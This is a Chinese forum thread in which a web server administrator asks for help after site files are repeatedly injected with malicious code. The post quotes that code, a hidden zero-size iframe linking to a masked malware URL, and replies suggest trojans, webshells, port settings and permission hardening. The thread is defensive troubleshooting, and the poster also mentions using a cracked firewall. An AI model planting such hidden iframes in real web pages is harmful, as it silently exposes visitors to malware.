有关网站服务器的安全问题，高分求助！
网站服务器，WIN2000SERVER，SQL2000SP4，江民杀毒2006，网站工作组和服务器同在一个局域网中，服务器网站文件目录共享，没有安装防火墙。

最近一个月常发现网站目录中的文件被注入恶意代码，都是病毒链接，访问我的网页就会被个人电脑的杀毒软件发现并杀掉，代码类似于这种： <iframe   src= "http://www.#######.com/sd/vote/xin/he1p.html "   width= "0 "   height= "0 "   frameborder= "0 "> </iframe> ，我把网站的主要ASP文件设为只读，这样也不能防止他们改写文件，更有甚者，他们修改了文件的属性，把本该可读写的文件设成了只读。

我安装了江民的个人防火墙，可是不能用，运行一两个小时后就会使网站访问速度很慢。慎重起见我在我自己的电脑（WIN2000）上安装了黑冰服务器版（网上下的破解版），可是运行不起来，启动后半分钟就自动关闭了。

我想请问：
1、是不是黑冰和江民有冲突不能共处，我的黑冰怎么运行不了呢？
2、这样的恶意修改网站文件，是病毒还是黑客攻击呢？
3、如果安装了防火墙，我该打开哪些端口？需要的功能如下：
开放式网站的正常访问（包括OBLOG、论坛等）、局域网文件共享、局域网SQL的连接、JMAIL、网站提供少量的压缩文件下载，PCANYWHERE连接、博客用户可以上传一些图片和WORD文档等。

谢谢高手，分不够可以再开帖送分！！！

------解决方案--------------------
1、是不是黑冰和江民有冲突不能共处，我的黑冰怎么运行不了呢？
----------------------------------
装一个isa吧 功能强一点
2、这样的恶意修改网站文件，是病毒还是黑客攻击呢？
------------------------------------------------
木马
3、开放式网站的正常访问（80）、局域网文件共享 （135.139.445）局域网SQL的连接（1433）

多找些资料看看 慢慢就提高了

------解决方案--------------------
从症状看来，应该是通过木马控制的
你可以先重查杀木马入手
黑客应该是通过代码漏洞先获得webshell，然后植入木马的
另外，江民的墙据说不怎么样的
------解决方案--------------------
可能是网站代码有漏洞，把你的网站代码按日期排列，找到最近被修改过的代码，仔细的研究一下，找出漏洞补上
------解决方案--------------------
WIN2000SERVER能不能直接安装6。0
-----------------------------------------
不可以的

可以考虑就此机会用2003
------解决方案--------------------
网站的主站是我们自己开发的，有的栏目用.asp,有的是用的.net，还有博客和论坛用的程序都是从网上下的，一共有四种不同的程序，但都被改写过！
-----------------------------------------
服务器上还有其他网站没?有可能旁注攻击


关键不是5.0还是6.0，设置安全才是最主要的

硬件防火墙。。。又不是DDOS，没必要。代价太高，找专业人员帮忙设置下

看看是不是网站本身的漏洞，还是服务器，还是一些没用的组件。。。
------解决方案--------------------
给你一点建议：

1：开始的FTP不要直接到网站目录。二是传到另一个分区，然后转移到网站目录。

2：网站的IIS不要开启写入选项。

3：根据网站运行情况，一个文件夹一个文件夹的设置NTFS权限。

4:网站程序最好从新一个一个检查一遍。

希望对你有用。